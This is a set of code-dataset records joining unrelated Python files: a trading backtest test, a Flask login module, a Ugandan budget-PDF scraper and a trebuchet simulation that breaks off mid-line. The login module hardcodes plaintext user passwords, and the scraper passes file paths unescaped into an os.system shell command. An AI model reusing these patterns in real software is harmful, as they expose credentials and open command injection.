trans_entries = map(lambda x: x+datetime.timedelta(minutes = 1), buy_entries)\n for dt, high in data.high.iteritems():\n curtime = dt.time()\n close = data.close[dt]\n if dt in trans_entries:\n buy_prices.append(prehigh+OFFSET)\n elif curtime == sell1:\n for bprice in buy_prices:\n close_profit -= (close-bprice)\n buy_prices = buy_prices[-1:]\n buy_prices = []\n elif dt == data.index[-1]:\n # 最后一根,强平现有持仓\n for bp in buy_prices:\n close_profit -= (close - bp)\n buy_prices = []\n pos_profit = 0 # 持仓盈亏\n for pos_price in buy_prices:\n pos_profit -= (close - pos_price)\n #print dt, pos_profit, close\n #print buy_prices\n equities.append(close_profit+pos_profit+captial)\n dts.append(dt)\n prehigh = high\n return equities, dts\n\ndef target_all_holding_sell(data, sell_entries, captial):\n \"\"\" 返回策略多头限价平仓超过当前bar价格范围的历史资金状况 \"\"\" \n buy_prices = []\n close_profit = 0 # 累计平仓盈亏\n equities = [] \n dts = []\n trans_entries = map(lambda x: x+datetime.timedelta(minutes = 1), sell_entries)\n bprice = None\n prehigh = data.high[0]\n for dt, high in data.high.iteritems():\n close = data.close[dt]\n if dt.time() == buy1:\n bprice = close\n elif bprice and dt in trans_entries:\n close_profit += (prehigh+OFFSET-bprice)\n bprice = None\n elif dt == data.index[-1]:\n # 最后一根, 强平现有持仓\n if bprice:\n close_profit += (close - bprice)\n bprice = None\n elif dt.time () == sell3:\n # 不隔日\n if bprice:\n close_profit += (close - bprice)\n bprice = None\n pos_profit = 0 # 持仓盈亏\n if bprice:\n pos_profit += (close - bprice)\n equities.append(close_profit+pos_profit+captial)\n dts.append(dt)\n prehigh = high\n return equities, dts\n\ndef target_all_holding_cover(data, cover_entries, captial):\n \"\"\" 返回策略空头限价平仓超过当前bar价格范围的历史资金状况 \"\"\" \n ## @TODO 11号无法成交,可用来测试“去隔夜单”\n buy_prices = []\n close_profit = 0 # 累计平仓盈亏\n equities = [] \n dts = []\n trans_entries = map(lambda x: x+datetime.timedelta(minutes = 1), cover_entries)\n bprice = None\n prelow = data.low[0]\n for dt, low in data.low.iteritems():\n close = data.close[dt]\n if dt.time() == buy1:\n bprice = close\n elif bprice and dt in 
trans_entries:\n close_profit -= (prelow-OFFSET-bprice)\n bprice = None\n elif dt == data.index[-1]:\n # 最后一根, 强平现有持仓\n if bprice:\n close_profit -= (close - bprice)\n bprice = None\n elif dt.time () == sell3:\n # 不隔日\n if bprice:\n close_profit -= (close - bprice)\n bprice = None\n pos_profit = 0 # 持仓盈亏\n if bprice:\n pos_profit -= (close - bprice)\n equities.append(close_profit+pos_profit+captial)\n dts.append(dt)\n prelow = low\n return equities, dts\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"quantdigger/tests/test_blotter.py","file_name":"test_blotter.py","file_ext":"py","file_size_in_byte":21988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"605884082","text":"# -*- coding: utf-8 -*-\n\nfrom flask import request, render_template, Blueprint, session, redirect, url_for\nfrom flask.ext.login import LoginManager, UserMixin, login_required, login_user, logout_user, current_user\n\ncckm_login_blueprint = Blueprint('auth', __name__)\n\nlogin_manager = LoginManager()\nlogin_manager.login_view = \"/login\"\n\nusers = {\n \"Jennifer\": (\"Jennifer\", \"jennifer_chuang\"),\n \"Jason\": (\"Jason\", \"jason_hsu\"),\n \"Naboson\": (\"Naboson\", \"naboson_chen\"),\n \"Jean\": (\"Jean\", \"jean_tu\")\n}\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n return User(user_id)\n\n\nclass User(UserMixin):\n def __init__(self, id, active=True):\n self.id = id\n self.active = active\n\n def is_active(self):\n # Here you should write whatever the code is\n # that checks the database if your user is active\n return self.active\n\n def is_anonymous(self):\n return False\n\n def is_authenticated(self):\n return True\n\n\n@cckm_login_blueprint.route(\"/login\", methods=['GET', 'POST'])\ndef login():\n if current_user is not None and current_user.is_authenticated:\n return redirect(url_for('dashboard.get_dashboard'))\n\n if request.method == 'GET':\n return render_template('login_2.html')\n\n username = request.form['form-username']\n password = request.form['form-password']\n\n if users.get(username) is not None and users.get(username)[1] == password:\n user = User(username)\n login_user(user, remember=True)\n session['username'] = username\n return redirect(url_for('dashboard.get_dashboard'))\n return render_template('login_2.html', error_msg='帳號或密碼錯誤,請重新登入。')\n\n@cckm_login_blueprint.route(\"/logout\")\ndef logout():\n logout_user()\n session.pop('username', None)\n return render_template('login_2.html', info_msg='登出成功,請重新登入。')\n\n\ndef verify_user_login():\n if current_user is not None and current_user.is_authenticated:\n return redirect(url_for('dashboard.get_dashboard'))","sub_path":"cckm/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"268437574","text":"#!/usr/bin/env python\n\nimport sys, os\nimport re\nimport urllib2, lxml.etree\nfrom optparse import OptionParser\nimport pdb\nimport itertools\nimport operator\nimport csv\nfrom operator import itemgetter\nimport glob\n\nparser = OptionParser()\nparser.add_option(\"-i\", \"--input\", dest=\"input\", default=\"S:/Projects/Programme resources/Data/Data sets/Domestic Government Expenditure/Government budgets/Uganda/Missing PDFs/Tororo MC Q3.pdf\",\n help=\"Input pdf name\", metavar=\"FILE\")\nparser.add_option(\"-o\", \"--output\", dest=\"output\", default=\"S:/Projects/Programme resources/Data/Data sets/Domestic Government 
Expenditure/Government budgets/Uganda/Missing PDFs/Data/Tororo_MC_2013-14.csv\",\n help=\"Output path. Default is './'\",metavar=\"FOLDER\")\nparser.add_option(\"-d\", \"--debug\", dest=\"debug\", default=False,\n help=\"Debug\",metavar=\"BOOLEAN\")\n(options, args) = parser.parse_args()\n\ndef remdash(string):\n return unicode(string.replace(u'\\u2013',\"-\")).encode('utf-8')\ndef trytext(el):\n textList = []\n text = el.text\n childText = None\n grandchildText = None\n children = el.getchildren()\n childLen = len(children)\n if childLen>0:\n child = children[0]\n childText = child.text\n grandchildren = child.getchildren()\n grandchildLen = len(grandchildren)\n if grandchildLen>0:\n grandchild = grandchildren[0]\n grandchildText = grandchild.text\n result = \"\"\n textList.append(text)\n textList.append(childText)\n textList.append(grandchildText)\n finalList = filter(None,textList)\n result = \" \".join(finalList)\n output = remdash(result)\n if output==\"\":\n return None\n else:\n return output\n \ndef pdftoxml(pdfdata, options):\n \"\"\"converts pdf file to xml file\"\"\"\n # lots of hacky Windows fixes c.f. original\n basename = os.path.basename(pdfdata)\n inputname, inputextension = os.path.splitext(basename)\n absDir = os.path.dirname(pdfdata)+\"/\"\n cmd = 'pdftohtml -xml -nodrm -zoom 1.5 -enc UTF-8 -noframes \"'\n if options:\n cmd += options\n cmd += pdfdata\n cmd += '\" \"'\n cmd += absDir\n cmd += inputname+'.xml\"'\n cmd = cmd + \" > NUL 2>&1\" # can't turn off output, so throw away even stderr yeuch\n os.system(cmd)\n with open(absDir+inputname+'.xml', 'r') as f:\n return f.read()\n\ndef main():\n #Before writing, try pdftohtml NAME.pdf -xml NAME.xml\n #Requires Poppler for windows in your path\n #http://blog.alivate.com.au/poppler-windows/\n datasets = []\n path = options.input\n basename = os.path.basename(path)\n inputname, inputextension = os.path.splitext(basename)\n print(\"Reading \"+basename+\"...\")\n xmldata = pdftoxml(path,False)\n root = lxml.etree.fromstring(xmldata)\n pages = list(root)\n output = []\n pageLen = len(pages)\n #Cascade these down...\n district = \"\"\n vote = \"\"\n workplan = \"\"\n AorB = \"\"\n AorBs = [\"A: Breakdown of Workplan Revenues: \",\"B: Breakdown of Workplan Expenditures: \"]\n budgetType = \"\"\n budgetTypes = [\"Recurrent Revenues\",\"Development Revenues\",\"Recurrent Expenditure\",\"Development Expenditure\"]\n for i in range(0,pageLen):\n isTable = False\n page = pages[i]\n elLen = len(page)\n for j in range(0,elLen):\n el = page[j]\n if el.tag == \"text\":\n left = int(el.attrib['left'])\n right = int(el.attrib['left'])+int(el.attrib['width'])\n top = int(el.attrib['top'])\n font = int(el.attrib['font'])\n if not isTable:\n if trytext(el)==\"Local Government Quarterly Performance Report\":\n prev1 = el.getprevious()\n prev2 = el.getprevious().getprevious()\n vote = \"\" if prev1 is None else trytext(prev1)\n district = \"\" if prev2 is None else trytext(prev2)\n #Scrape all page text by going backwards and forwards...\n pageTexts = []\n pageTexts.append(trytext(el))\n #Backwards\n prev = el.getprevious()\n while prev is not None and prev.tag == \"text\":\n pageTexts.append(trytext(prev))\n prev = prev.getprevious()\n #Forwards\n nxt = el.getnext()\n while nxt is not None and nxt.tag == \"text\":\n pageTexts.append(trytext(nxt))\n nxt = nxt.getnext()\n if AorBs[0] in pageTexts or AorBs[1] in pageTexts or budgetTypes[0] in pageTexts or budgetTypes[1] in pageTexts or budgetTypes[2] in pageTexts or budgetTypes[3] in pageTexts:\n 
workplans = [elemText for elemText in pageTexts if elemText[:9]==\"Workplan \" and \":\" in elemText]\n if len(workplans)>=1:\n workplan = workplans[0] if len(workplans)==1 else workplans[1]\n isTable = True\n else:\n if trytext(el)==\"Local Government Quarterly Performance Report\":\n prev1 = el.getprevious()\n prev2 = el.getprevious().getprevious()\n vote = \"\" if prev1 is None else trytext(prev1)\n district = \"\" if prev2 is None else trytext(prev2)\n #Scrape all page text by going backwards and forwards...\n pageTexts = []\n pageTexts.append(trytext(el))\n #Backwards\n prev = el.getprevious()\n while prev is not None and prev.tag == \"text\":\n pageTexts.append(trytext(prev))\n prev = prev.getprevious()\n #Forwards\n nxt = el.getnext()\n while nxt is not None and nxt.tag == \"text\":\n pageTexts.append(trytext(nxt))\n nxt = nxt.getnext()\n if AorBs[0] not in pageTexts and AorBs[1] not in pageTexts and budgetTypes[0] not in pageTexts and budgetTypes[1] not in pageTexts and budgetTypes[2] not in pageTexts and budgetTypes[3] not in pageTexts:\n isTable = False\n continue\n if trytext(el) in AorBs:\n AorB = trytext(el)\n elif trytext(el) in budgetTypes:\n budgetType = trytext(el)\n elif abs(left-73)<5 or abs(left-133)<5 or abs(left-116)<5 or abs(left-121)<5:\n #Find row by going backwards and forwards...\n row = []\n elTop = int(el.attrib['top'])\n obj = {}\n obj['text'] = trytext(el)\n obj['top'] = int(el.attrib['top'])\n obj['left'] = int(el.attrib['left'])\n obj['right'] = int(el.attrib['left'])+int(el.attrib['width'])\n row.append(obj)\n #Backwards\n prev = el.getprevious()\n if prev is not None:\n prevTop = int(prev.attrib['top'])\n else:\n prevTop = 0\n while prev is not None and \"top\" in prev.attrib:\n obj = {}\n obj['text'] = trytext(prev)\n obj['top'] = int(prev.attrib['top'])\n obj['left'] = int(prev.attrib['left'])\n obj['right'] = int(prev.attrib['left'])+int(prev.attrib['width'])\n if abs(elTop-prevTop)<4:\n row.append(obj)\n prev = prev.getprevious()\n if prev is not None and \"top\" in prev.attrib:\n prevTop = int(prev.attrib['top'])\n else:\n prevTop = 0\n #Forwards\n nxt = el.getnext()\n if nxt is not None and \"top\" in nxt.attrib:\n nxtTop = int(nxt.attrib['top'])\n else:\n nxtTop = 0\n while nxt is not None:\n obj = {}\n obj['text'] = trytext(nxt)\n obj['top'] = int(nxt.attrib['top'])\n obj['left'] = int(nxt.attrib['left'])\n obj['right'] = int(nxt.attrib['left'])+int(nxt.attrib['width'])\n obj['font'] = int(nxt.attrib['font'])\n if abs(elTop-nxtTop)<4:\n row.append(obj)\n nxt = nxt.getnext()\n if nxt is not None and \"top\" in nxt.attrib:\n nxtTop = int(nxt.attrib['top'])\n else:\n nxtTop = 0\n rowvals = operator.itemgetter('left')\n row.sort(key=rowvals)\n if len(row)>=2 and re.search(\"[a-zA-Z\\/\\\\\\(\\)_]\",\"\".join([item['text'] for item in row[1:]]))==None:\n #Find missing pieces of data, replace them with blanks \n rowArr = []\n rowArr.append(row[0]['text'])\n rights = [449]\n for r in range(len(rights)):\n right = rights[r]\n textMatch = False\n for element in row[1:]:\n if abs(element['right']-right)<18:\n textMatch = element['text']\n if textMatch:\n rowArr.append(textMatch)\n else:\n rowArr.append(\"\")\n metaObj = {}\n metaObj[\"Source\"] = rowArr[0]\n metaObj[\"AB\"] = rowArr[1]\n #2013/14 Approved Budget\n obj = {}\n obj['Year']=\"2013/14 Approved Budget\"\n obj['Government']=\"District Government\"\n obj['District']=district\n obj['Vote']=vote\n obj['Revenue/Expenditure'] = \"Revenue\" if AorB[:1]==\"A\" else \"Expenditure\"\n obj['Budget Type'] = 
budgetType\n obj['Workplan'] = workplan\n obj['Value']=metaObj[\"AB\"]\n obj['Revenue Source']=metaObj[\"Source\"]\n output.append(obj)\n datasets+=output\n if options.debug:\n pdb.set_trace()\n keys = datasets[0].keys()\n with open(options.output, 'wb') as output_file:\n dict_writer = csv.DictWriter(output_file, keys)\n dict_writer.writeheader()\n dict_writer.writerows(datasets)\n sys.stdout.write(\"\\n\")\n print(\"Done.\")\n\nmain()","sub_path":"DevInit/Uganda/Spotlight/expend_scrape-13-14-Tororo.py","file_name":"expend_scrape-13-14-Tororo.py","file_ext":"py","file_size_in_byte":11601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"303281833","text":"''' a bit more in the comment...\n'''\n\nimport dynamics.simulation\nfrom dynamics.frame import Frame\nfrom dynamics.spring import NailSpring\nfrom dynamics.object import Rectangle, Circle, Beam\nfrom dynamics.constraint import Nail, Rod, Pin, Shelf\nfrom dynamics.animation import Animation\n\nfrom dynamics.constants import foot2meter, inch2meter, meter2foot\nfrom dynamics.misc import length_, rot2radians, radians2rot\nfrom dynamics.constants import lb2kgram, kgram2lb, newton2lb\nfrom dynamics.constants import pine_density, steel_density\n\nfrom flight import Flight\n\nimport scipy\nimport scipy.interpolate\nimport numpy as np\nfrom math import pi, sin, cos, sqrt, acos, atan2\n#from scipy.optimize.optimize import fmin\nfrom scipy.optimize.minpack import fsolve\n#from scipy.interpolate.fitpack2 import UnivariateSpline\nfrom pylab import plot\n\nscipy.set_printoptions(precision=5, linewidth=200)\ndef treb( sling_length = 8.54665, # sling length, feet\n ramp_length = 11, # ramp length, feet\n link_sum = 5.587, # sum of upper and lower link lengths, feet\n hanger_x = 11.38508, # feet\n hanger_y = -2,\n hinge_x = (6.+2.)/12., # feet\n hinge_y = -4.0,\n alpha=90, # arm start angle, ccw from horizontal (degrees)\n omega=10, # cocked angle between upper link and lower link\n cw_drop = 5.0, # feet\n cw_weight = 4581., # pounds\n cw_moment_arm = 10.41, # distance from hinge to cw center of gravity, feet\n cw_moment = 3.516e6, # counterweight moment about its CG, lb*ft^2\n upper_link_weight = 2*58., # pounds\n lower_link_weight = 2*52., # pounds\n link_axle_weight = 106, # pounds\n connector_rod_weight = 84.8, # pounds\n connector_brace_weight = 105, # pounds\n pumpkin_weight = 10.0, # pounds\n sling_weight = 1.7, # pounds\n sim_duration = 2.0, # seconds\n dry_fire = False, # True to disable sling from time 0 \n time_step = 0.001, # seconds\n slide_y = -9, # feet\n arm_depth = (10.+1./4.)/12., # inches\n arm_thick = (5.+1./4.)/12., # inches\n arm_end_depth = (6.+5./8)/12.,# inches\n arm_end_thick = (3.+1./8)/12.,# inches\n release_pin_weight = 9, # pounds\n release_time = 0.0, #seconds\n debug = True):\n\n sim = dynamics.simulation.Simulation(max_time=sim_duration,\n time_step=time_step)\n sim.debug=debug\n\n # convert arguments to metric and radians\n sling_length = foot2meter(sling_length)\n hanger_pos = foot2meter(np.array((hanger_x, hanger_y)))\n del hanger_x, hanger_y\n hinge_pos = foot2meter(np.array((hinge_x, hinge_y)))\n del hinge_x, hinge_y\n slide_y = foot2meter(slide_y)\n arm_depth = foot2meter(arm_depth)\n arm_thick = foot2meter(arm_thick)\n arm_end_depth = foot2meter(arm_end_depth)\n arm_end_thick = foot2meter(arm_end_thick)\n ramp_length = foot2meter(ramp_length)\n link_sum = foot2meter(link_sum)\n sim.release_time = release_time\n alpha = scipy.deg2rad(alpha)\n omega = 
scipy.deg2rad(omega)\n cw_drop = foot2meter(cw_drop)\n cw_mass = lb2kgram(cw_weight)\n cw_moment_arm = foot2meter(cw_moment_arm)\n cw_moment = cw_moment / 32.174049 * 0.00029263965 # convert lb to slug, then\n # slug*in^2 to kgram*meter^2\n connector_rod_mass = lb2kgram(connector_rod_weight)\n connector_brace_mass = lb2kgram(connector_brace_weight)\n upper_link_mass = lb2kgram(upper_link_weight)\n lower_link_mass = lb2kgram(lower_link_weight)\n link_axle_mass = lb2kgram(link_axle_weight)\n pumpkin_mass = lb2kgram(pumpkin_weight)\n sling_mass = lb2kgram(sling_weight)\n release_pin_mass = lb2kgram(release_pin_weight)\n\n # long arm length to reach slide\n long_arm_length = -slide_y / np.sin(alpha) - inch2meter(0)\n\n # compute rest cw position thru triangulation\n rest_cw_ctr = circle_intersection(hanger_pos, link_sum,\n hinge_pos, ramp_length)\n\n # compute cocked cw position on circle about hinge, up 'drop' meters from rest position\n cocked_cw_ctr = np.array((None, rest_cw_ctr[1] + cw_drop))\n # ramp_length**2 = (x-hinge_x)**2 + (y-hinge_y)**2\n cocked_cw_ctr[0] = hinge_pos[0] + sqrt(ramp_length**2 - (cocked_cw_ctr[1]-hinge_pos[1])**2)\n\n # cocked connection point is on ellipse w/ foci at hanger and cocked_cw, 'string' length\n # equal to link_sum, 'string' interior angle omega. In maxima:\n # r2: s-r1\n # eq1: d^2 = r1^2+r2^2-2*r1*r2*cos(omega)\n # solve(eq1, r1)\n d = length_(hanger_pos - cocked_cw_ctr)\n s = link_sum\n sol1 = -(sqrt(s**2*cos(omega)**2 + 2*d**2*cos(omega)-s**2+2*d**2) - s*cos(omega) - s)/(2*cos(omega)+2)\n sol2 = (sqrt(s**2*cos(omega)**2 + 2*d**2*cos(omega)-s**2+2*d**2) + s*cos(omega) + s)/(2*cos(omega)+2)\n upper_link_length = min(sol1,sol2)\n lower_link_length = max(sol1,sol2)\n if abs((upper_link_length+lower_link_length-link_sum)/link_sum) > 0.001:\n print(\"link sum error\")\n print(\" upper_link_length=\", meter2foot(upper_link_length))\n print(\" lower_link_length=\", meter2foot(lower_link_length))\n print(\" link_sum=\", meter2foot(link_sum))\n raise ValueError\n cocked_connection_pos = circle_intersection(cocked_cw_ctr, lower_link_length,\n hanger_pos, upper_link_length)\n\n # all link angles measured at top of link\n cocked_upper_link_angle = rot2radians(cocked_connection_pos - hanger_pos)\n cocked_lower_link_angle = rot2radians(cocked_cw_ctr - cocked_connection_pos)\n rest_upper_link_angle = rot2radians(rest_cw_ctr - hanger_pos)\n rest_lower_link_angle = rest_upper_link_angle\n rest_connection_pos = hanger_pos + upper_link_length * radians2rot(rest_upper_link_angle)\n\n # end of short arm is on ellipse with foci at axle and cocked connection, with 'string' length\n # distance from axle to rest connection point.\n axle_rest_connection_distance = length_(rest_connection_pos)\n ellipse_axis_angle = rot2radians(-cocked_connection_pos)\n ellipse_a = axle_rest_connection_distance / 2.0\n ellipse_f = length_(cocked_connection_pos) / 2.0\n ellipse_e = ellipse_f / ellipse_a\n theta = ellipse_axis_angle - cocked_upper_link_angle\n connector_length = ellipse_a * (1-ellipse_e**2) / (1 - ellipse_e*cos(theta))\n\n # cocked_connection angle measured at connection point\n cocked_connection_angle = cocked_upper_link_angle\n cocked_short_arm_end = cocked_connection_pos + connector_length * radians2rot(cocked_connection_angle)\n short_arm_length = length_(cocked_short_arm_end)\n if abs((short_arm_length + connector_length - axle_rest_connection_distance)/axle_rest_connection_distance) > 0.001:\n print (\"short arm length error:\")\n print (\" ellipse_a=\", 
meter2foot(ellipse_a))\n print (\" ellipse_f=\", meter2foot(ellipse_f))\n print (\" ellipse_e=\", ellipse_e)\n print (\" theta=\", scipy.rad2deg(theta))\n print (\" connector_length=\", meter2foot(connector_length))\n print (\" short_arm_length=\", meter2foot(short_arm_length))\n print (\" axle_rest_connection_distance=\",\n meter2foot(axle_rest_connection_distance))\n raise ValueError\n\n # short arm angle measured at axle\n cocked_short_arm_angle = rot2radians(cocked_short_arm_end)\n\n # compute beta, angle from long arm to short arm\n beta = pi + alpha - cocked_short_arm_angle\n\n # long arm end, cocked\n cocked_long_arm_end = long_arm_length * radians2rot(pi+alpha)\n\n # other dimensions\n pumpkin_diameter = inch2meter(8.0)\n pumpkin_ctr = cocked_long_arm_end + np.array((sling_length, 0.0))\n\n if debug:\n # rest short arm angle and position (for printing only)\n rest_short_arm_angle = rot2radians(rest_connection_pos)\n rest_short_arm_end = short_arm_length * radians2rot(rest_short_arm_angle)\n\n # rest long arm angle and position (for printing only)\n rest_long_arm_angle = (pi+alpha) + (rest_short_arm_angle - cocked_short_arm_angle)\n rest_long_arm_end = long_arm_length * radians2rot(rest_long_arm_angle)\n\n print(\"slide_y=\", meter2foot(slide_y))\n print(\"long_arm_length=\", meter2foot(long_arm_length))\n print(\"pumpkin=\", meter2foot(pumpkin_ctr))\n print(\"hanger=\", meter2foot(hanger_pos))\n print(\"cocked_connection=\", meter2foot(cocked_connection_pos))\n print(\"cocked_cw=\", meter2foot(cocked_cw_ctr))\n print(\"cocked_short_arm=\", meter2foot(cocked_short_arm_end))\n print(\"cocked_long_arm=\", meter2foot(cocked_long_arm_end))\n print(\"cocked_lower_link_angle=\", scipy.rad2deg(cocked_lower_link_angle))\n print(\"rest_lower_link_angle=\", scipy.rad2deg(rest_lower_link_angle))\n print(\"connector_length=\", meter2foot(connector_length))\n print(\"lower_link_length=\", meter2foot(lower_link_length))\n print(\"rest_cw_ctr=\", meter2foot(rest_cw_ctr))\n print(\"rest_connection=\", meter2foot(rest_connection_pos))\n print(\"rest_short_arm=\", meter2foot(rest_short_arm_end))\n print(\"rest_long_arm=\", meter2foot(rest_long_arm_end))\n \n ### Machine frame origin is at axle\n sim.machineFrame=Frame(sim, \"machine\", theta=0, origin=(0,0))\n sim.machineFrame.machine=Rectangle(sim.machineFrame,\n l=hanger_pos[0]+2.0,\n w=-slide_y+1.0,\n theta=0,\n origin=(hanger_pos[0]/2,\n (slide_y)/2),\n mass=lb2kgram(5000),\n color=(0,0,0))\n front_foot_pos = (hanger_pos[0], slide_y-0.5)\n rear_foot_pos = (0, slide_y - 0.5)\n sim.machineFrame.rear_foot=Rectangle(sim.machineFrame,\n l=0.3,\n w=0.1,\n origin=rear_foot_pos,\n mass=0,\n color=(0,0,0))\n sim.machineFrame.front_foot=Rectangle(sim.machineFrame,\n l=0.3,\n w=0.1,\n origin=front_foot_pos,\n mass=0,\n color=(0,0,0))\n\n ### Arm frame origin is at axle. 
Framespace has long arm horizontal to the left\n sim.armFrame=Frame(sim, \"arm\", theta=alpha, origin=(0,0))\n sim.armFrame.long_arm=Beam(sim.armFrame,\n x0=-long_arm_length, d0=arm_end_depth, t0=arm_end_thick,\n x1=0, d1=arm_depth, t1=arm_thick,\n density=pine_density,\n color=(0.8,0.3,0))\n sim.armFrame.short_arm=dynamics.object.Rectangle(sim.armFrame,\n l=inch2meter(18.99),\n w=inch2meter(8.0),\n theta=-beta,\n origin=(-inch2meter(15.0)*cos(beta),\n inch2meter(15.0)*sin(beta)),\n mass=lb2kgram(53),\n color=(0.8,0.3,0))\n sim.armFrame.connector_pin=dynamics.object.Circle(sim.armFrame,\n radius=inch2meter(2.0),\n origin=(-short_arm_length*cos(beta),\n short_arm_length*sin(beta)),\n mass=lb2kgram(1),\n color=(0.8,0.3,0))\n sim.armFrame.long_arm_plate=dynamics.object.Rectangle(sim.armFrame,\n l=inch2meter(27.5),\n w=inch2meter(8.0),\n theta=0.0,\n origin=(inch2meter(-6.25), 0),\n mass=lb2kgram(63),\n color=(0.8,0.3,0))\n sim.armFrame.release_pin=dynamics.object.Circle(sim.armFrame,\n radius=inch2meter(6),\n origin=(-long_arm_length, 0),\n mass=release_pin_mass, color=(1.0, 1.0, 1.0))\n\n # Wdight frame origin is at pivot point, ramp horizontal to the right\n cocked_ramp_angle = rot2radians(cocked_cw_ctr-hinge_pos)\n sim.weightFrame=dynamics.frame.Frame(sim, \"weight\", theta=cocked_ramp_angle, origin=hinge_pos)\n sim.weightFrame.ramp = dynamics.object.Rectangle(sim.weightFrame, l=ramp_length, w=inch2meter(4),\n mass=0, color=(0.3,0.5,0.2),\n origin = (ramp_length/2,0))\n sim.weightFrame.cw = dynamics.object.Rectangle(sim.weightFrame, l=foot2meter(2.6), w=foot2meter(2.6),\n color=(0.3,0.5,0.2),\n mass=cw_mass,\n origin = (cw_moment_arm,0),\n moment = cw_moment)\n\n # Lower link frame origin is at end of ramp\n sim.lowerLinkFrame = dynamics.frame.Frame(sim, \"lower link\", origin=cocked_cw_ctr,\n theta = cocked_lower_link_angle-pi)\n sim.lowerLinkFrame.link = dynamics.object.Rectangle(sim.lowerLinkFrame, l=lower_link_length, w=inch2meter(6),\n mass=lower_link_mass, color=(1.0,0.0,0.0),\n origin=(lower_link_length/2, 0.0))\n sim.lowerLinkFrame.axle=dynamics.object.Circle(sim.lowerLinkFrame,\n radius=inch2meter(3),\n origin=(lower_link_length, 0.0),\n mass=link_axle_mass, color=(1.0, 0.0, 0.0))\n\n # Upper link frame origin is the hanger\n cocked_upper_link_angle = rot2radians(cocked_connection_pos-hanger_pos)\n sim.upperLinkFrame = dynamics.frame.Frame(sim, \"upper link\", origin=hanger_pos,\n theta = cocked_upper_link_angle)\n sim.upperLinkFrame.link = dynamics.object.Rectangle(sim.upperLinkFrame, l=upper_link_length, w=inch2meter(6),\n mass=upper_link_mass, color=(1.0,0.0,0.0),\n origin=(upper_link_length/2, 0.0))\n\n # Connector frame origin is the end of the short arm\n sim.connectorFrame = dynamics.frame.Frame(sim, \"connector\", origin=cocked_short_arm_end,\n theta = rot2radians(cocked_connection_pos - cocked_short_arm_end))\n sim.connectorFrame.rod = dynamics.object.Rectangle(sim.connectorFrame, l=connector_length,\n w=inch2meter(2),\n mass=connector_rod_mass,\n color=(0.0, 0.0, 0.0),\n origin=(connector_length/2, 0.0))\n sim.connectorFrame.stiffener = dynamics.object.Rectangle(sim.connectorFrame, l=connector_length,\n w=inch2meter(4.0),\n mass=lb2kgram(100),\n color=(0.0, 0.0, 0.0),\n origin=(connector_length/2, inch2meter(3.0)))\n sim.connectorFrame.brace = dynamics.object.Rectangle(sim.connectorFrame, l=foot2meter(2),\n w=inch2meter(4),\n mass=connector_brace_mass,\n color=(0.0, 0.0, 0.0),\n origin=(connector_length-foot2meter(1), 0.0))\n\n # Pumpkin\n 
sim.pumpkinFrame=dynamics.frame.Frame(sim, \"pumpkin\", origin=pumpkin_ctr)\n sim.pumpkinFrame.pumpkin=dynamics.object.Circle(sim.pumpkinFrame,\n radius=pumpkin_diameter/2.0,\n mass=pumpkin_mass, color=(1.0, 0.5, 0))\n sim.pumpkinFrame.sling=dynamics.object.Circle(sim.pumpkinFrame,\n radius=pumpkin_diameter/2.0,\n mass=sling_mass, color=(1.0, 0.5, 0))\n\n # initialize frames\n for frame in sim.frames:\n frame.init()\n\n # define constraints\n sim.rear_foot = Nail(sim, \"rear foot\",\n obj=sim.machineFrame.rear_foot,\n xobj=(0,0),\n xworld=rear_foot_pos)\n\n sim.front_foot = NailSpring(sim, \"front foot\",\n obj=sim.machineFrame.front_foot,\n xobj=(0,0),\n x_world=front_foot_pos,\n spring_constant=1e6,\n damping_constant=500e3)\n\n sim.axle = Pin(sim, \"axle\",\n obj0=sim.armFrame.long_arm,\n xobj0=(0, 0),\n obj1=sim.machineFrame)\n\n sim.hinge =Pin(sim, \"hinge\",\n obj0=sim.weightFrame.ramp,\n xobj0=(-ramp_length/2, 0.0),\n obj1=sim.machineFrame)\n\n sim.hanger = Pin(sim, \"hanger\",\n obj0=sim.upperLinkFrame.link,\n xobj0=(-upper_link_length/2.0,0.0),\n obj1=sim.machineFrame)\n\n sim.linkPin = Pin(sim, \"linkPin\",\n obj0=sim.upperLinkFrame.link,\n xobj0= (upper_link_length/2.0, 0.0),\n obj1=sim.lowerLinkFrame.link,\n xobj1 = (lower_link_length/2.0, 0.0))\n\n sim.rampPin = dynamics.constraint.Pin(sim, \"rampPin\",\n obj0=sim.weightFrame.ramp,\n xobj0= (ramp_length/2.0, 0.0),\n obj1=sim.lowerLinkFrame.link,\n xobj1 = (-lower_link_length/2.0, 0.0))\n\n sim.connectorPin1 = Pin(sim, \"connectorPin1\",\n obj0=sim.armFrame.connector_pin,\n xobj0=(0.0,0.0),\n obj1=sim.connectorFrame.rod,\n xobj1 = (-connector_length/2.0, 0.0))\n\n sim.connectorPin2 = Pin(sim, \"connectorPin2\",\n obj0=sim.upperLinkFrame.link,\n xobj0=(upper_link_length/2.0,0.0),\n obj1=sim.connectorFrame.rod,\n xobj1 = (connector_length/2.0, 0.0))\n\n sim.sling=Rod(sim, \"sling\",\n obj0=sim.armFrame.long_arm, xobj0=(-long_arm_length,\n 0),\n obj1=sim.pumpkinFrame.pumpkin, xobj1=(0.0,0.0),\n length=sling_length)\n '''\n sim.trigger = Rod(sim, \"trigger\",\n obj0=sim.pumpkinFrame.pumpkin,\n xobj0= (0.0, 0.0),\n obj1=sim.machineFrame.front_foot,\n xobj1= (0.0,0.0))\n '''\n\n sim.slide=Shelf(sim, \"slide\",\n obj=sim.pumpkinFrame.pumpkin,\n xobj=(0,0),\n height=slide_y)\n\n if (dry_fire):\n sim.sling.enabled = False\n\n print( \" running simulation\")\n from time import clock\n tstart=clock()\n sim.run(continue_sim, debug=debug)\n print (\" done: time=%g sec\" % (clock()-tstart))\n\n if not sim.release_time:\n sim.range = Y2range(sim,sim.Y)\n range_spline = scipy.interpolate.UnivariateSpline(sim.t, sim.range, k=3,s=0.0)\n d0,t0 = max( (range,time) for range,time in zip(sim.range, sim.t) ) # find guess\n sim.tmax = fsolve(range_spline, t0, args=1) # root of first derivative of range\n sim.maxrange = range_spline(sim.tmax)\n launchDegrees_spline = scipy.interpolate.UnivariateSpline(sim.t, Y2launchDegrees(sim.Y), 